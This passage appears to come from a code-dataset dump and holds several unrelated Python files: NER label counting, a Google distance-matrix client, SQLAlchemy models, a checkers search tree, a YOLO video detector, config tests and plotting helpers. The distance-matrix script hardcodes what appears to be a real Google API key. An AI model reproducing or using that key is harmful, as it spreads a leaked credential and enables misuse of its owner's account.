label_word_counter=Counter()\n\n word_count=0\n entities_count=0\n\n for c in label_counter:\n split_c=c.split(\"-\",1)\n type_c=split_c[0]\n if type_c==\"O\":\n word_count+=label_counter[c]\n continue\n entity_name=split_c[1]\n #print(entity_name, split_c, type_c)\n if type_c==\"B\":\n label_phrase_counter[entity_name]+=label_counter[c]\n label_word_counter[entity_name]+=label_counter[c]\n word_count+=label_counter[c]\n entities_count+=label_counter[c]\n elif type_c==\"I\":\n label_word_counter[entity_name]+=label_counter[c]\n\n result={}\n result[\"label_phrase_counter\"]=label_phrase_counter\n result[\"word_count\"]=word_count\n result[\"entity_count\"]=entities_count\n result[\"label_word_counter\"]=label_word_counter\n return result\n\n\n def Read_File(self, ip_file):\n list_of_sentence_words_in_file=[]\n list_of_sentence_labels_in_file=[]\n current_sent_words=[]\n current_sent_labels=[]\n\n for line in 
open(ip_file):\n            line=line.strip()\n            if line==\"\":\n                list_of_sentence_words_in_file.append(current_sent_words)\n                list_of_sentence_labels_in_file.append(current_sent_labels)\n                current_sent_words=[]\n                current_sent_labels=[]\n                continue\n\n\n            (word, gold_label)= line.split(\"\\t\")\n            current_sent_words.append(word)\n            current_sent_labels.append(gold_label)\n\n        return (list_of_sentence_words_in_file, list_of_sentence_labels_in_file)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"code/baseline_CRF/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"500451054","text":"\"\"\"In this file a distance graph is built using the Google Distance API.\nThe program reads a text file of addresses and gets back the distances between those addresses,\nwhich are then neatly arranged in a matrix.\"\"\"\n\nfrom __future__ import division\nfrom __future__ import print_function\nfrom urllib.request import urlopen\nimport urllib\nimport json\n\n\ndef createData(txtFile):\n    \"\"\"Creates a dictionary with all the data, such as the API key & a list of addresses\"\"\"\n    with open(txtFile, \"r\") as file:\n        addresses = [line.strip() for line in file] # Adds all addresses without '\\n'\n        data = {'API_key': 'AIzaSyAfYV8HCGn_rETcA1QtHbL_z2WIUXTSawg', 'addresses': addresses}\n    return data\n\n\ndef createMatrix(data):\n    \"\"\"This function creates the data for the matrix and passes it on to buildMatrix.\n    This is the 'main code' of this file; everything comes together here\"\"\"\n    addresses = data['addresses']\n    API_key = data['API_key']\n\n    maxAddresses = 100 # Google accepts at most 100 addresses per request\n    numberAddresses = len(addresses)\n    maxRows = maxAddresses // numberAddresses\n    q, r = divmod(numberAddresses, maxRows)\n    destinationAdresses = addresses\n    matrix = []\n\n    for item in range(q):\n        startAddresses = addresses[item * maxRows: (item + 1) * maxRows]\n        response = apiRequest(startAddresses, destinationAdresses, API_key)\n        matrix += buildMatrix(response)\n\n    if r > 0:\n        startAddresses = addresses[q * maxRows: q * maxRows + r]\n        response = apiRequest(startAddresses, destinationAdresses, API_key)\n        matrix += buildMatrix(response)\n    return matrix\n\n\ndef apiRequest(start, destination, key):\n    \"\"\"This function builds and sends a request to get the distance between 2 addresses\"\"\"\n\n    def createRequestString(addresses):\n        \"\"\"This function puts the addresses into the proper request format\"\"\"\n        requestString = ''\n        for number in range(len(addresses) - 1):\n            requestString += addresses[number] + '|' # inserts '|' between the addresses\n        requestString += addresses[-1]\n        return requestString\n\n    requestURL = 'https://maps.googleapis.com/maps/api/distancematrix/json?units=metric'\n    startString = createRequestString(start)\n    destinationString = createRequestString(destination)\n    request = requestURL + '&origins=' + startString + '&destinations=' + \\\n        destinationString + '&key=' + key\n    result = urllib.request.urlopen(request).read() # Performs the API request\n    return json.loads(result)\n\n\ndef buildMatrix(response):\n    \"\"\"This function builds the matrix from the data coming out of createMatrix\"\"\"\n\n    matrix = []\n    for row in response['rows']:\n        row_list = [row['elements'][j]['distance']['value'] for j in range(len(row['elements']))]\n        matrix.append(row_list)\n    return matrix\n\n\ndef main(txtFile):\n    \"\"\"Call this function to create a graph via the google 
api\"\"\"\n\n data = createData(txtFile)\n distanceMatrix = createMatrix(data)\n return distanceMatrix\n\n\nif __name__ == '__main__':\n distMatrix = main(\"Adresses.txt\")\n for matrixRow in distMatrix:\n print(matrixRow)\n","sub_path":"Source/createGraph.py","file_name":"createGraph.py","file_ext":"py","file_size_in_byte":3183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"167174651","text":"from sqlalchemy import *\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import sessionmaker, relationship\n\nfrom sqlalchemy import create_engine\n\nBase = declarative_base()\n\n## BELOW = CREATING MY TABLES\nclass City(Base):\n __tablename__ = 'city'\n id = Column(Integer, primary_key=True)\n name = Column(Text)\n state = Column(Text)\n city_ = relationship('Teams')\n\n\nclass Sports(Base):\n __tablename__ = 'sports'\n id = Column(Integer, primary_key=True)\n name = Column(Text)\n sport_ = relationship('Teams')\n\n\nclass Teams(Base):\n __tablename__ = 'teams'\n id = Column(Integer, primary_key=True)\n name = Column(Text)\n\n teams_ = relationship('Players')\n\n city_id = Column(Integer, ForeignKey('city.id')) #this one\n city = relationship(City, back_populates='city_')\n\n sport_id = Column(Integer, ForeignKey('sports.id')) #this one\n sport = relationship(Sports, back_populates='sport_')\n\n\nclass Players(Base):\n __tablename__ = 'players'\n id = Column(Integer, primary_key=True)\n name = Column(Text)\n number = Column(Integer, default=None)\n height = Column(Text)\n weight = Column(Float)\n age = Column(Text)\n team_id = Column(Integer, ForeignKey('teams.id')) # this one\n team = relationship(Teams, back_populates='teams_')\n\n\n##### BELOW = INSTANTIATING MY OBJECTS\n# engine = create_engine('sqlite:///sports.db')\n# Base.metadata.create_all(engine)\n#\n#\n# Session = sessionmaker(bind=engine)\n# session = Session()\n#\n# nyc = City(name='New York City', state='New York')\n# la = City(name='Los Angeles', state='California' )\n#\n# bball = Sports(name='Basketball')\n# baseball = Sports(name='Baseball')\n#\n# session.add_all([la,nyc,bball,baseball])\n# session.commit()\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"634071240","text":"from neuralnetwork import *\nfrom threading import Lock\n\n# the permanent tree data structure\nclass PermaTree:\n def __init__(self, checker, is_cuda):\n self.is_cuda = is_cuda\n self.node_count = 0\n self.root = PermaNode(self, checker.state)\n self.last_capture = 0\n\n def move_root(self, node):\n # move from root to a immediate child\n # update parent to None\n if not node.is_root():\n if node.from_edge.is_capture:\n self.last_capture = 0\n else:\n self.last_capture += 1\n self.root = node\n self.root.parent = None\n\n # def update(self, edge):\n # pass\n #\n # def update(self, node):\n # pass\n\n\nclass PermaEdge:\n \"\"\"\n Guarantees that from_node and to_node are not None\n \"\"\"\n\n def __init__(self, perma_tree, action, from_node):\n self.perma_tree = perma_tree\n # an Action object of the checker program\n self.action = action\n # a Node object for where the action comes from\n self.from_node = from_node\n # initialize node whenever an edge is created, guarantees the data structure property\n self.to_node = PermaNode(perma_tree, action.get_flipped_state(), self.from_node, self)\n self.is_capture = action.is_capture\n # 
self.to_node = None # create new child node in expand() and update this\n\n # # these values are initialized at expand() and updated in backup()\n self.visit_count = 0\n self.total_action_value = 0\n self.mean_action_value = 0\n # from neural network queue\n self.value = None\n self.logit = None\n # computed after the from_node is ready\n self.prior_probability = None\n\n def checker_to_tensor(self):\n return binary_board(self.to_node.checker_state.board)\n\n def assign_value(self, nn):\n tensors = states_to_batch_tensor([self.to_node.checker_state], self.perma_tree.is_cuda)\n value = nn(tensors)\n self.value = value.cpu().numpy().tolist()[0][0]\n return value\n\nclass PermaNode:\n \"\"\"\n Guarantees that from_edge is not None. May not have self.edges\n \"\"\"\n\n def __init__(self, perma_tree, checker_state, parent=None, from_edge=None):\n self.perma_tree = perma_tree\n # every element in self.edges is an Edge object\n self.checker_state = checker_state\n self.parent = parent # parent is an edge, None when root\n self.from_edge = from_edge\n # adjacency list implementation\n self.edges = []\n # locked if the children prior probability is being calculated by the neural network or selection is in progress\n self.lock = Lock()\n self.unassigned=0\n self.probability_ready=False\n perma_tree.node_count += 1\n\n def is_leaf(self):\n return len(self.edges) == 0\n\n def is_root(self):\n return self.from_edge is None\n\n def construct_edges(self):\n \"\"\"\n\n :return: there are no edges\n \"\"\"\n # call get_legal_actions from checker\n actions, _ = self.checker_state.get_legal_actions()\n if len(actions) == 0:\n return True\n # init and add edges into node\n for action in actions:\n new_edge = PermaEdge(self.perma_tree, action, self) # prior_prob will be updated in expand()\n self.edges.append(new_edge)\n return False\n\n def get_children_checker_states(self):\n return [edge.to_node.checker_state for edge in self.edges]\n\n def put_children_on_nn_queue(self, nn_queue):\n \"\"\"\n self is a leaf node that is being expanded\n This function will asynchronously assign the child edge value and prior probability\n A worker thread with neural network is constantly scanning the nn_queue to assign edges in batch\n :param parallel_nn_queue:\n :return:\n \"\"\"\n self.lock.acquire()\n for edge in self.edges:\n self.unassigned+=1\n nn_queue.put(edge)\n\n def find_child(self, state):\n for child in [e.to_node for e in self.edges]:\n if child.checker_state.board_hash() == state.board_hash():\n return child\n\n #\n # # this lock will be released when all of its children are evaluated\n # states = [edge.to_node.checker_state for edge in self.edges]\n # input_tensor = states_to_batch_tensor(states, self.perma_tree.is_cuda)\n # value_tensor = nn(input_tensor)\n # value_array = value_tensor.cpu().numpy()\n # value_array = np.squeeze(value_array, axis=1)\n # value_list = value_array.tolist()\n # for edx, edge in enumerate(self.edges):\n # edge.value = value_list[edx]\n #\n # # initialize the prior probability of all children\n # p = nn.children_values_to_probability(value_tensor)\n # # assert that all edges must not be shuffled\n # # this should only be used for MCTS, not training. 
no gradient is here.\n # npp = p.cpu().numpy().tolist()\n # for edx, edge in enumerate(self.edges):\n # edge.prior_probability = npp[edx]\n\n\n def is_first_player(self):\n return not self.checker_state.flipped","sub_path":"demodir/yesterday/permatree.py","file_name":"permatree.py","file_ext":"py","file_size_in_byte":5224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"631878050","text":"MONGO_HOST = 'localhost'\nMONGO_PORT = 27017\n\nMONGO_DBNAME = 'materials'\n\n# Enable reads (GET), inserts (POST) and DELETE for resources/collections\n# (if you omit this line, the API will default to ['GET'] and provide\n# read-only access to the endpoint).\nRESOURCE_METHODS = ['GET', 'POST', 'DELETE']\n\n# Enable reads (GET), edits (PATCH), replacements (PUT) and deletes of\n# individual items (defaults to read-only item access).\nITEM_METHODS = ['GET', 'PATCH', 'PUT', 'DELETE']\n\n# Disables concurrency control\n# When enabled, ETag is required value within If-Match HTTP header\n# Stops race conditions (which we'll ignore for now for testing purposes)\nIF_MATCH = False","sub_path":"environment.py","file_name":"environment.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"351478463","text":"import py\n\nprint(dir(py))\n\n\ns = py.Seed()\nprint(\"seed\", s.getOwner())\n\ncoord = py.CubeCoord(1, 1, 1)\ncell = py.Cell(0)\nb = py.Board({coord: cell})\nprint(\"board\", b.coords, b.map)\nprint(b.coords[0].getOpposite())\n\ncm = py.CommandManager()\n\nprint(dir(py.exception))\n# from py.exception.CellNotValidException import CellNotValidException\n# raise py.exception.CellNotValidException.CellNotValidException(37)\n\nr = py.Referee()\nr.init()\n\n# exit()\n\n# ------\n\nfrom py.java.compat import Collections, Random\n\nr = Random(seed=1337)\n\nL = [i for i in range(10)]\nprint(L) # [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]\n\nCollections.shuffle(L, r)\nprint(L) # [3, 4, 1, 8, 7, 6, 0, 2, 5, 9]\n\n# --\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"560957525","text":"def solution(tickets):\n answer = []\n stack = []\n visited = [0] * len(tickets)\n begin = 'ICN'\n\n # end = tickets[0][1]\n stack.append(begin)\n answer.append(begin)\n\n answer = graph(tickets, stack, visited, answer)\n return answer\n\n\ndef graph(tickets, stack, visited, answer):\n while stack:\n begin = stack.pop(0)\n begin_candidate = []\n for i in range(len(tickets)):\n if visited[i] == 0:\n if begin == tickets[i][0]:\n begin_candidate.append([tickets[i][1], i])\n else:\n continue\n if len(begin_candidate) == 1:\n idx = begin_candidate[0][1]\n visited[idx] = 1\n stack.append(tickets[idx][1])\n answer.append(tickets[idx][1])\n\n elif len(begin_candidate) > 1:\n begin_candidate.sort()\n idx = begin_candidate[0][1]\n visited[idx] = 1\n stack.append(tickets[idx][1])\n answer.append(tickets[idx][1])\n\n else:\n continue\n print(stack, 'stack')\n print(answer)\n return answer\n\ntickets = [[\"ICN\", \"BBB\"], [\"ICN\", \"CCC\"], [\"BBB\", \"CCC\"], [\"CCC\", \"BBB\"], [\"CCC\", \"ICN\"]]\nsolution(tickets)","sub_path":"김용재/211120 여행경로.py","file_name":"211120 여행경로.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"510232277","text":"import cv2\nimport numpy as 
np\n\nimport time\nimport sys\n\nCONFIDENCE = 0.5\nSCORE_THRESHOLD = 0.5\nIOU_THRESHOLD = 0.5\nconfig_path = \"cfg/yolov3.cfg\"\nweights_path = \"weights/yolov3.weights\"\nfont_scale = 1\nthickness = 1\nlabels = open(\"data/coco.names\").read().strip().split(\"\\n\")\ncolors = np.random.randint(0, 255, size=(len(labels), 3), dtype=\"uint8\")\n\nnet = cv2.dnn.readNetFromDarknet(config_path, weights_path)\n\nln = net.getLayerNames()\ntry:\n ln = [ln[i[0] - 1] for i in net.getUnconnectedOutLayers()]\nexcept IndexError:\n # in case getUnconnectedOutLayers() returns 1D array when CUDA isn't available\n ln = [ln[i - 1] for i in net.getUnconnectedOutLayers()]\n# read the file from the command line\nvideo_file = sys.argv[1]\ncap = cv2.VideoCapture(video_file)\n_, image = cap.read()\nh, w = image.shape[:2]\nfourcc = cv2.VideoWriter_fourcc(*\"XVID\")\nout = cv2.VideoWriter(\"output.avi\", fourcc, 20.0, (w, h))\nwhile True:\n _, image = cap.read()\n\n h, w = image.shape[:2]\n blob = cv2.dnn.blobFromImage(image, 1/255.0, (416, 416), swapRB=True, crop=False)\n net.setInput(blob)\n start = time.perf_counter()\n layer_outputs = net.forward(ln)\n time_took = time.perf_counter() - start\n print(\"Time took:\", time_took)\n boxes, confidences, class_ids = [], [], []\n\n # loop over each of the layer outputs\n for output in layer_outputs:\n # loop over each of the object detections\n for detection in output:\n # extract the class id (label) and confidence (as a probability) of\n # the current object detection\n scores = detection[5:]\n class_id = np.argmax(scores)\n confidence = scores[class_id]\n # discard weak predictions by ensuring the detected\n # probability is greater than the minimum probability\n if confidence > CONFIDENCE:\n # scale the bounding box coordinates back relative to the\n # size of the image, keeping in mind that YOLO actually\n # returns the center (x, y)-coordinates of the bounding\n # box followed by the boxes' width and height\n box = detection[:4] * np.array([w, h, w, h])\n (centerX, centerY, width, height) = box.astype(\"int\")\n\n # use the center (x, y)-coordinates to derive the top and\n # and left corner of the bounding box\n x = int(centerX - (width / 2))\n y = int(centerY - (height / 2))\n\n # update our list of bounding box coordinates, confidences,\n # and class IDs\n boxes.append([x, y, int(width), int(height)])\n confidences.append(float(confidence))\n class_ids.append(class_id)\n\n # perform the non maximum suppression given the scores defined before\n idxs = cv2.dnn.NMSBoxes(boxes, confidences, SCORE_THRESHOLD, IOU_THRESHOLD)\n\n font_scale = 1\n thickness = 1\n\n # ensure at least one detection exists\n if len(idxs) > 0:\n # loop over the indexes we are keeping\n for i in idxs.flatten():\n # extract the bounding box coordinates\n x, y = boxes[i][0], boxes[i][1]\n w, h = boxes[i][2], boxes[i][3]\n # draw a bounding box rectangle and label on the image\n color = [int(c) for c in colors[class_ids[i]]]\n cv2.rectangle(image, (x, y), (x + w, y + h), color=color, thickness=thickness)\n text = f\"{labels[class_ids[i]]}: {confidences[i]:.2f}\"\n # calculate text width & height to draw the transparent boxes as background of the text\n (text_width, text_height) = cv2.getTextSize(text, cv2.FONT_HERSHEY_SIMPLEX, fontScale=font_scale, thickness=thickness)[0]\n text_offset_x = x\n text_offset_y = y - 5\n box_coords = ((text_offset_x, text_offset_y), (text_offset_x + text_width + 2, text_offset_y - text_height))\n overlay = image.copy()\n cv2.rectangle(overlay, box_coords[0], 
box_coords[1], color=color, thickness=cv2.FILLED)\n # add opacity (transparency to the box)\n image = cv2.addWeighted(overlay, 0.6, image, 0.4, 0)\n # now put the text (label: confidence %)\n cv2.putText(image, text, (x, y - 5), cv2.FONT_HERSHEY_SIMPLEX,\n fontScale=font_scale, color=(0, 0, 0), thickness=thickness)\n\n out.write(image)\n cv2.imshow(\"image\", image)\n \n if ord(\"q\") == cv2.waitKey(1):\n break\n\n\ncap.release()\ncv2.destroyAllWindows()","sub_path":"machine-learning/object-detection/read_video.py","file_name":"read_video.py","file_ext":"py","file_size_in_byte":4531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"481424074","text":"import io\nimport json\nimport socket\nfrom typing import Dict, Tuple, Union\n\nimport boto3\nimport pytest\nimport yaml\nfrom botocore.client import BaseClient\nfrom botocore.response import StreamingBody\nfrom botocore.session import Session\nfrom botocore.stub import Stubber\nfrom pydantic import BaseModel, ValidationError\nfrom pytest_mock import MockerFixture\n\nfrom pydantic_appconfig import AppConfigHelper\n\n\nclass TestConfig(BaseModel):\n \"\"\"Test pydantic parsing.\"\"\"\n\n __test__ = False\n\n test_field_string: str\n test_field_int: int\n\n class Config:\n \"\"\"The config, including title for the JSON schema.\"\"\"\n\n title = \"TestConfig\"\n\n\ndef test_config_returned_as_model(\n appconfig_stub: Tuple[BaseClient, Stubber, Session],\n mocker: MockerFixture,\n) -> None:\n \"\"\"Tests the config gets updated.\"\"\"\n client, stub, _ = appconfig_stub\n stub.add_response(\n \"get_configuration\",\n _build_response(\n {\n \"test_field_string\": \"testing_string\",\n \"test_field_int\": 42,\n },\n \"1\",\n \"application/json\",\n ),\n _build_request(),\n )\n mocker.patch.object(boto3, \"client\", return_value=client)\n a: AppConfigHelper[TestConfig] = AppConfigHelper(\n \"AppConfig-App\",\n \"AppConfig-Env\",\n \"AppConfig-Profile\",\n 15,\n config_schema_model=TestConfig,\n )\n result = a.update_config()\n assert result\n assert a.config.test_field_string == \"testing_string\"\n assert a.config.test_field_int == 42\n assert a.config_version == \"1\"\n\n\ndef test_yaml_config_returned_as_model(\n appconfig_stub: Tuple[BaseClient, Stubber, Session],\n mocker: MockerFixture,\n) -> None:\n \"\"\"Tests the config gets updated.\"\"\"\n client, stub, _ = appconfig_stub\n stub.add_response(\n \"get_configuration\",\n _build_response(\n {\n \"test_field_string\": \"testing_string\",\n \"test_field_int\": 42,\n },\n \"1\",\n \"application/x-yaml\",\n ),\n _build_request(),\n )\n mocker.patch.object(boto3, \"client\", return_value=client)\n a: AppConfigHelper[TestConfig] = AppConfigHelper(\n \"AppConfig-App\",\n \"AppConfig-Env\",\n \"AppConfig-Profile\",\n 15,\n config_schema_model=TestConfig,\n )\n result = a.update_config()\n assert result\n assert a.config.test_field_string == \"testing_string\"\n assert a.config.test_field_int == 42\n assert a.config_version == \"1\"\n\n\ndef test_config_model_parse_error(\n appconfig_stub: Tuple[BaseClient, Stubber, Session], mocker: MockerFixture\n) -> None:\n \"\"\"Tests the config rejected.\"\"\"\n client, stub, _ = appconfig_stub\n stub.add_response(\n \"get_configuration\",\n _build_response(\n {\n \"xxx\": \"testing_string\",\n },\n \"1\",\n \"application/json\",\n ),\n _build_request(),\n )\n mocker.patch.object(boto3, \"client\", return_value=client)\n a: AppConfigHelper[TestConfig] = AppConfigHelper(\n \"AppConfig-App\",\n 
\"AppConfig-Env\",\n \"AppConfig-Profile\",\n 15,\n config_schema_model=TestConfig,\n )\n result = a.update_config()\n assert result\n with pytest.raises(ValidationError):\n assert a.config.test_field_string\n\n\ndef _build_request(\n app: str = \"AppConfig-App\",\n env: str = \"AppConfig-Env\",\n profile: str = \"AppConfig-Profile\",\n client_id: str = None,\n version: str = \"null\",\n) -> Dict[str, str]:\n if client_id is None:\n client_id = socket.gethostname()\n return {\n \"Application\": app,\n \"ClientConfigurationVersion\": str(version),\n \"ClientId\": client_id,\n \"Configuration\": profile,\n \"Environment\": env,\n }\n\n\ndef _build_response(\n content: Union[Dict, str], version: str, content_type: str\n) -> Dict[str, Union[str, StreamingBody]]:\n if content_type == \"application/json\":\n content_text = json.dumps(content).encode(\"utf-8\")\n elif content_type == \"application/x-yaml\":\n content_text = str(yaml.dump(content)).encode(\"utf-8\")\n elif not isinstance(content, str):\n raise ValueError(\"Unrecognised content.\")\n else:\n content_text = content.encode(\"utf-8\")\n return {\n \"Content\": StreamingBody(io.BytesIO(bytes(content_text)), len(content_text)),\n \"ConfigurationVersion\": version,\n \"ContentType\": content_type,\n }\n","sub_path":"tests/test_pydantic_config.py","file_name":"test_pydantic_config.py","file_ext":"py","file_size_in_byte":4488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"594485490","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Apr 04 13:58:30 2015\n\n@author: Andrew Lawson\n@email: al1g13@soton.ac.uk\n\nName: plotting.py\nPurpose: All-purpose functions for plotting correlators.\n\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport fitting\n\n\nclass PlotParms:\n \"\"\"\n Class: PlotParms\n Purpose: Track plot parameters.\n \"\"\"\n _markers = ['o', '^', 's', 'x', 'v', '+']\n _point_cols = ['b', 'g', 'r', 'k', 'm', 'c']\n _line_cols = ['g', 'm', 'c', 'r', 'b', 'k']\n\n marker_index = 0\n point_index = 0\n line_index = 0\n\n def __init__(self):\n \"\"\"New PlotParms instance\"\"\"\n self.reset()\n return\n\n def get_next_marker(self):\n \"\"\"Scatter plot point marker\"\"\"\n marker = self._markers[self.marker_index]\n self.marker_index = (self.marker_index + 1) % len(self._markers)\n return marker\n\n def get_next_point_col(self):\n \"\"\"Colour of scatter points.\"\"\"\n point_col = self._point_cols[self.point_index]\n self.point_index = (self.point_index + 1) % len(self._point_cols)\n return point_col\n\n def get_next_line_col(self):\n \"\"\"Colour of fit line.\"\"\"\n line_col = self._line_cols[self.line_index]\n self.line_index = (self.line_index + 1) % len(self._line_cols)\n return line_col\n\n def reset(self, index=0):\n self.marker_index = index\n self.point_index = index\n self.line_index = index\n\nGLOB_PLOT_PARMS = PlotParms()\n\ndef plot_with_errors(x, y, yerr, col='b', label=None, xerr=None, marker='o',\n markersize=4, xlabel=None, ylabel=None, ax=None,\n show=False):\n \"\"\"\n Name: plot_with_errors\n Parameters: x - the data along the x axis.\n y - the data along the y axis.\n yerr - error in the y data.\n col - colour to use in plot.\n label - label of plot.\n Returns: None.\n Purpose: Scatter plot of y against x data with y errors included.\n \"\"\"\n #plt.scatter(x, y, c=col, marker=marker, markersize=3)\n fmt = col + marker\n if ax is None:\n plot = plt.errorbar(x, y, yerr=yerr, xerr=xerr, fmt=fmt,\n markersize=markersize, 
label=label)\n else:\n plot = ax.errorbar(x, y, yerr=yerr, xerr=xerr, fmt=fmt,\n markersize=markersize, label=label)\n if xlabel is not None:\n plt.xlabel(xlabel)\n if ylabel is not None:\n plt.ylabel(ylabel)\n\n if show is True:\n plt.show()\n return\n else:\n return plot\n\n\ndef plot_fit_with_errors(correlator, fit_func, fit_func_label,\n fitted_params, jackknife_params,\n limits, N_t, param_return_func=None,\n errors=None, calc_errs=True,\n corr_manip_func=None, avg_manip_parms=None,\n jack_manip_parms=None, manip_func_args=[],\n bootstrap=True,\n corr_label=None, fit_label=None, fig_name=None,\n xlabel=None, ylabel=None, point_col='b', line_col='g',\n err_col='#3F7F4C', shade_col='#7EFF99',\n split_t_J=False, log_scale=True, legend_loc=1,\n xlim=None, ylim=None, set_ylim=False, show=True,\n fit_lims=[], pass_fit=False,\n marker='o', markersize=4, ax=None):\n \"\"\"\n Name: plot_fit_with_errors\n Purpose: Plot a correlator, its asymptotic fit function and associated\n errors.\n \"\"\"\n #==========================================================================\n # Initialise variables.\n #==========================================================================\n N_cf = len(jackknife_params)\n low = limits[0][0]\n high = limits[0][1]\n if split_t_J is True:\n t_J = limits[1]\n t = np.arange(low, high)\n\n if len(fit_lims) == 0:\n fit_lims = [low, high]\n\n limits[0] = fit_lims\n x = np.arange(fit_lims[0], fit_lims[1])\n\n if ax is not None:\n axes = ax\n else:\n axes = plt\n\n #==========================================================================\n # Plot the average measured correlator and respective error bars.\n #==========================================================================\n if errors is None and calc_errs is True:\n #======================================================================\n # If errors are to be calculated, then compute them here.\n #======================================================================\n if corr_manip_func is not None:\n avg, err = \\\n fitting.avg_across_time_with_jack_fit(correlator,\n avg_manip_parms,\n jack_manip_parms,\n corr_manip_func,\n manip_func_args)\n else:\n avg, err = fitting.avg_across_time_slices(correlator,\n bootstrap=bootstrap)\n else:\n #======================================================================\n # Otherwise errors should have been passed to the function.\n #======================================================================\n avg = correlator\n err = errors\n\n if log_scale is True:\n axes.scatter(t, np.abs(avg[low:high]), c=point_col, marker=marker)\n fmt_str = point_col + 'o'\n axes.errorbar(t, np.abs(avg[low:high]), yerr=err[low:high],\n fmt=fmt_str, label=corr_label, marker=marker,\n markersize=markersize)\n else:\n axes.scatter(t, avg[low:high], c=point_col, marker=marker)\n fmt_str = point_col + 'o'\n axes.errorbar(t, avg[low:high], yerr=err[low:high],\n fmt=fmt_str, label=corr_label, marker=marker,\n markersize=markersize)\n\n #==========================================================================\n # Construct the ground state fits.\n #==========================================================================\n if param_return_func is not None:\n fit_params = param_return_func(fitted_params, fit_func_label)\n else:\n fit_params = fitted_params\n\n try:\n y = fit_func(limits, fit_params)\n except TypeError:\n y = fit_func(limits, *fit_params)\n\n y_len = len(y)\n if log_scale is True:\n y = np.abs(y)\n\n #==========================================================================\n 
# Compute jackknife errors on the ground state fits.\n    #==========================================================================\n    y_arr = np.zeros((N_cf, y_len))\n\n    for ii in range(N_cf):\n        if param_return_func is not None:\n            fit_params = param_return_func(jackknife_params[ii], fit_func_label)\n        else:\n            fit_params = jackknife_params[ii]\n        try:\n            y_arr[ii] = fit_func(limits, *fit_params)\n        except TypeError:\n            y_arr[ii] = fit_func(limits, fit_params)\n\n    y_err = np.std(y_arr, axis=0)\n    del y_arr\n    if bootstrap is False:\n        y_err *= np.sqrt(N_cf)\n\n    #==========================================================================\n    # Plot the correlators and their ground state contributions.\n    #==========================================================================\n    if split_t_J is True and pass_fit is False:\n        axes.plot(x[:t_J], y[:t_J], c=line_col, label=fit_label)\n        axes.fill_between(x[:t_J], y[:t_J] - y_err[:t_J], y[:t_J] + y_err[:t_J],\n                          alpha=0.2, edgecolor=err_col, facecolor=shade_col)\n        axes.plot(x[t_J + 1:], y[t_J + 1:], c=line_col)\n        axes.fill_between(x[t_J + 1:], y[t_J + 1:] - y_err[t_J + 1:],\n                          y[t_J + 1:] + y_err[t_J + 1:], alpha=0.2,\n                          edgecolor=err_col, facecolor=shade_col)\n    elif pass_fit is True:\n        pass\n    else:\n        axes.plot(x, y, c=line_col, label=fit_label)\n        axes.fill_between(x, y - y_err, y + y_err, alpha=0.2,\n                          edgecolor=err_col, facecolor=shade_col)\n\n    if log_scale is True:\n        # 'axes' may be either the pyplot module or an Axes instance; only the\n        # former exposes yscale(), so branch explicitly here\n        if ax is not None:\n            ax.set_yscale('log')\n        else:\n            plt.yscale('log')\n\n    #if fit_func_label is not None and log_scale is True:\n    #    ymin = 0.7 * y.min()\n    #    ymax = 1.1 * y.max()\n    #    plt.ylim([ymin, ymax])\n\n    if xlim is not None:\n        if ax is not None:\n            ax.set_xlim(xlim)\n        else:\n            plt.xlim(xlim)\n    else:\n        if ax is not None:\n            ax.set_xlim([low - 1, high + 1])\n        else:\n            plt.xlim([low - 1, high + 1])\n    if ylim is not None:\n        if ax is not None:\n            ax.set_ylim(ylim)\n        else:\n            plt.ylim(ylim)\n\n    elif set_ylim is True:\n        # Use default y limits. Top 10% and bottom 10% of graph should be\n        # black space.\n        
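# Worked example (illustrative): with y_low = 0.0 and y_high = 1.0 the code below\n        # gives interval = 1.0, full_interval = 1.25, gap = 0.125, i.e. ylim = [-0.125, 1.125].\n        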
y_high = avg.max() + err.max()\n        y_low = avg.min() - err.max()\n        interval = y_high - y_low\n        full_interval = interval / 0.8\n        gap = (full_interval - interval) / 2.0\n        if ax is not None:\n            ax.set_ylim([y_low - gap, y_high + gap])\n        else:\n            plt.ylim([y_low - gap, y_high + gap])\n\n    if ylabel is not None:\n        if ax is not None:\n            ax.set_ylabel(ylabel)\n        else:\n            plt.ylabel(ylabel)\n    if xlabel is not None:\n        if ax is not None:\n            ax.set_xlabel(xlabel)\n        else:\n            plt.xlabel(xlabel)\n    if fit_label is not None or corr_label is not None:\n        axes.legend(loc=legend_loc)\n    if fig_name is not None:\n        plt.savefig(fig_name)\n    if show is True:\n        plt.show()\n        plt.close()\n\n    return\n\ndef plot_error_band(x, y, y_err, edgecolor='b', facecolor='b',\n                    plot_lines=True, line_col='b', label=None,\n                    show=False):\n    if plot_lines is True:\n        plt.plot(x, y - y_err, c=line_col, label=label)\n        plt.plot(x, y + y_err, c=line_col)\n\n    plt.fill_between(x, y - y_err, y + y_err, alpha=0.6,\n                     edgecolor=edgecolor, facecolor=facecolor)\n\n    if show is True:\n        plt.show()\n\n    return\n\n\ndef add_preliminary_overlay(ax):\n    \"\"\"\n    Name: add_preliminary_overlay\n    Parameters: ax - the axis over which to make the preliminary overlay.\n    Returns: None.\n    Purpose: Overlay the word 